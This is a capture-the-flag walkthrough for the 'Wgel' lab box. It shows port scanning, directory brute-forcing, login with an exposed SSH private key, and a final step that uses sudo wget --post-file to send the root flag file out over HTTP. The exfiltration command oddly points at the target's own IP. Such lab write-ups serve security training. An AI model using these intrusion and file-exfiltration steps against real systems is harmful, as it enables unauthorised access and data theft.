Wgel CTF

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.139.244

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,80

  • (-oN nmap): Saving it into a files called nmap

nmap -sV -sC -p 22,80 -oN nmap 10.10.139.244

Enumeration

Lets visit Port 80; the Web Server.

Its a default apache2 page, I made sure to check the source code and found something interesting

We now have a possible username Jessie, there is nothing else of interest so lets run gobuster to find hidden directories.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.139.244/

We found a hidden directory, lets go check it out

It is a very well made website, lets run gobuster on it in the background while we explore this webpage.

gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.139.244/sitemap

Looking at the website, most of the buttons work and are functional, we got the gobuster results, lets check them.

There is a /.ssh directory, which is really interesting, lets go see it.

We have an id_rsa file, which means that if we get the password for it with john the ripper and then we can login through ssh.

Lets first open the file and then copy the contents of the file and then make our own id_rsa file and paste it in .

Now lets find the password for it using ssh2john.

/usr/share/john/ssh2john.py id_rsa > id_rsa_hash

Oh, its looks like we do not need a password to login, so lets directly login.

chmod 600 id_rsa
ssh jessie@10.10.139.244 -i id_rsa

We are logged in. We can now read the user.txt file

Privilege Escalation

Lets run the command sudo -l to check what we can run as root.

sudo -l

It looks like we can run /usr/bin/wget as root, we can try to send the root flag file to our machine using wget as it is a command that can send files. So first we need to open a http server to receive files.

python3 -m http.server 8080

We also have to start a netcat listener

Now lets use this command to send the root flag to our machine, here we cannot be sure of the root flag file name but looking at the how the user flag was named, we can guess what it is named.

sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.10.139.244

After you hit enter, you get contents of a file.

This is the root flag.

Last updated